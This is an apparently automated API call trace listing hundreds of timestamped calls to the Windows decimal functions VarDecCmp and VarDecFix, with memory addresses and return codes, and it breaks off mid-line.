[0266.585] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.585] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c888, pdecRight=0x1b83c878) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c958, pdecRight=0x1b83c948) returned 0x2 [0266.585] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.585] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.585] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.585] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x2 [0266.586] VarDecFix (in: pdecIn=0x1b83c808, pdecResult=0x1b83c790 | out: pdecResult=0x1b83c790) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x2 [0266.586] VarDecFix (in: pdecIn=0x1b83c800, pdecResult=0x1b83c770 | out: pdecResult=0x1b83c770) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c7f0, pdecRight=0x1b83c7e0) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c7d0, pdecRight=0x1b83c7c0) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c808, pdecRight=0x1b83c7f8) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c918, pdecRight=0x1b83c908) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c808, pdecRight=0x1b83c7f8) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c918, pdecRight=0x1b83c908) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c8d8, pdecRight=0x1b83c8c8) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c7b8, pdecRight=0x1b83c7a8) returned 0x2 [0266.586] VarDecFix (in: pdecIn=0x1b83c798, pdecResult=0x1b83c720 | out: pdecResult=0x1b83c720) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c788, pdecRight=0x1b83c778) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c7b0, pdecRight=0x1b83c7a0) returned 0x2 [0266.586] VarDecFix (in: pdecIn=0x1b83c790, pdecResult=0x1b83c700 | out: pdecResult=0x1b83c700) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c780, pdecRight=0x1b83c770) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c760, pdecRight=0x1b83c750) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.586] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.586] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.586] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c718, pdecRight=0x1b83c708) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c888, pdecRight=0x1b83c878) returned 0x1 [0266.586] VarDecCmp (pdecLeft=0x1b83c768, pdecRight=0x1b83c758) returned 0x2 [0266.586] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.587] VarDecFix (in: pdecIn=0x1b83c628, pdecResult=0x1b83c5b0 | out: pdecResult=0x1b83c5b0) returned 0x0 [0266.587] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c640, pdecRight=0x1b83c630) returned 0x2 [0266.587] VarDecFix (in: pdecIn=0x1b83c620, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.587] VarDecCmp (pdecLeft=0x1b83c610, pdecRight=0x1b83c600) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x2 [0266.587] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.587] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.587] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.587] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x0 [0266.587] VarDecCmp (pdecLeft=0x1b83c8a8, pdecRight=0x1b83c898) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c888, pdecRight=0x1b83c878) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c958, pdecRight=0x1b83c948) returned 0x2 [0266.587] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.587] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.587] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.587] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.588] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.588] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.588] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.588] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.588] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.588] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.588] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.588] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.588] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.588] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.589] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.589] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.589] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.589] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.589] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.589] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.589] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.589] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.589] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.589] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.589] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.589] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.589] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.589] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.591] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.591] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.591] VarDecCmp (pdecLeft=0x1b83c6b8, pdecRight=0x1b83c6a8) returned 0x2 [0266.591] VarDecFix (in: pdecIn=0x1b83c698, pdecResult=0x1b83c620 | out: pdecResult=0x1b83c620) returned 0x0 [0266.591] VarDecCmp (pdecLeft=0x1b83c688, pdecRight=0x1b83c678) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c6b0, pdecRight=0x1b83c6a0) returned 0x2 [0266.591] VarDecFix (in: pdecIn=0x1b83c690, pdecResult=0x1b83c600 | out: pdecResult=0x1b83c600) returned 0x0 [0266.591] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c660, pdecRight=0x1b83c650) returned 0x2 [0266.591] VarDecCmp (pdecLeft=0x1b83c698, pdecRight=0x1b83c688) returned 0x2 [0266.591] VarDecCmp (pdecLeft=0x1b83c7c8, pdecRight=0x1b83c7b8) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c7a8, pdecRight=0x1b83c798) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c698, pdecRight=0x1b83c688) returned 0x2 [0266.591] VarDecCmp (pdecLeft=0x1b83c7c8, pdecRight=0x1b83c7b8) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c7a8, pdecRight=0x1b83c798) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c698, pdecRight=0x1b83c688) returned 0x2 [0266.591] VarDecCmp (pdecLeft=0x1b83c7c8, pdecRight=0x1b83c7b8) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c7a8, pdecRight=0x1b83c798) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c698, pdecRight=0x1b83c688) returned 0x2 [0266.591] VarDecCmp (pdecLeft=0x1b83c7c8, pdecRight=0x1b83c7b8) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c7a8, pdecRight=0x1b83c798) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c928, pdecRight=0x1b83c918) returned 0x2 [0266.591] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.591] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c3c8, pdecRight=0x1b83c3b8) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c3a8, pdecRight=0x1b83c398) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c3c8, pdecRight=0x1b83c3b8) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c3a8, pdecRight=0x1b83c398) returned 0x1 [0266.591] VarDecCmp (pdecLeft=0x1b83c3c8, pdecRight=0x1b83c3b8) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c3a8, pdecRight=0x1b83c398) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c3c8, pdecRight=0x1b83c3b8) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c3a8, pdecRight=0x1b83c398) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x2 [0266.592] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x2 [0266.592] VarDecCmp (pdecLeft=0x1b83c598, pdecRight=0x1b83c588) returned 0x2 [0266.592] VarDecCmp (pdecLeft=0x1b83c558, pdecRight=0x1b83c548) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c538, pdecRight=0x1b83c528) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c818, pdecRight=0x1b83c808) returned 0x2 [0266.592] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x2 [0266.592] VarDecFix (in: pdecIn=0x1b83c6d8, pdecResult=0x1b83c660 | out: pdecResult=0x1b83c660) returned 0x0 [0266.592] VarDecCmp (pdecLeft=0x1b83c6c8, pdecRight=0x1b83c6b8) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c6f0, pdecRight=0x1b83c6e0) returned 0x2 [0266.592] VarDecFix (in: pdecIn=0x1b83c6d0, pdecResult=0x1b83c640 | out: pdecResult=0x1b83c640) returned 0x0 [0266.592] VarDecCmp (pdecLeft=0x1b83c6c0, pdecRight=0x1b83c6b0) returned 0x1 [0266.592] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.592] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.592] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.592] VarDecCmp (pdecLeft=0x1b83c898, pdecRight=0x1b83c888) returned 0x2 [0266.593] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.593] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.593] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.593] VarDecCmp (pdecLeft=0x1b83c708, pdecRight=0x1b83c6f8) returned 0x1 [0266.593] VarDecCmp (pdecLeft=0x1b83c6e8, pdecRight=0x1b83c6d8) returned 0x1 [0266.593] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.593] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.594] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.594] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.594] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.595] VarDecCmp (pdecLeft=0x1b83c3b8, pdecRight=0x1b83c3a8) returned 0x0 [0266.595] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.595] VarDecCmp (pdecLeft=0x1b83c540, pdecRight=0x1b83c530) returned 0x2 [0266.595] VarDecCmp (pdecLeft=0x1b83c520, pdecRight=0x1b83c510) returned 0x0 [0266.595] VarDecCmp (pdecLeft=0x1b83c3b8, pdecRight=0x1b83c3a8) returned 0x0 [0266.595] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.595] VarDecCmp (pdecLeft=0x1b83c540, pdecRight=0x1b83c530) returned 0x2 [0266.595] VarDecCmp (pdecLeft=0x1b83c520, pdecRight=0x1b83c510) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c818, pdecRight=0x1b83c808) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c6f8, pdecRight=0x1b83c6e8) returned 0x2 [0266.596] VarDecFix (in: pdecIn=0x1b83c6d8, pdecResult=0x1b83c660 | out: pdecResult=0x1b83c660) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6c8, pdecRight=0x1b83c6b8) returned 0x1 [0266.596] VarDecCmp (pdecLeft=0x1b83c6f0, pdecRight=0x1b83c6e0) returned 0x2 [0266.596] VarDecFix (in: pdecIn=0x1b83c6d0, pdecResult=0x1b83c640 | out: pdecResult=0x1b83c640) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6c0, pdecRight=0x1b83c6b0) returned 0x1 [0266.596] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c6d8, pdecRight=0x1b83c6c8) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c7e8, pdecRight=0x1b83c7d8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c898, pdecRight=0x1b83c888) returned 0x2 [0266.596] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.596] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.597] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c708, pdecRight=0x1b83c6f8) returned 0x1 [0266.597] VarDecCmp (pdecLeft=0x1b83c6e8, pdecRight=0x1b83c6d8) returned 0x1 [0266.598] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.598] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.598] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.598] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.598] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.598] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.598] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.598] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.598] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.599] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.599] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.599] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.599] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.599] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.599] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.599] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 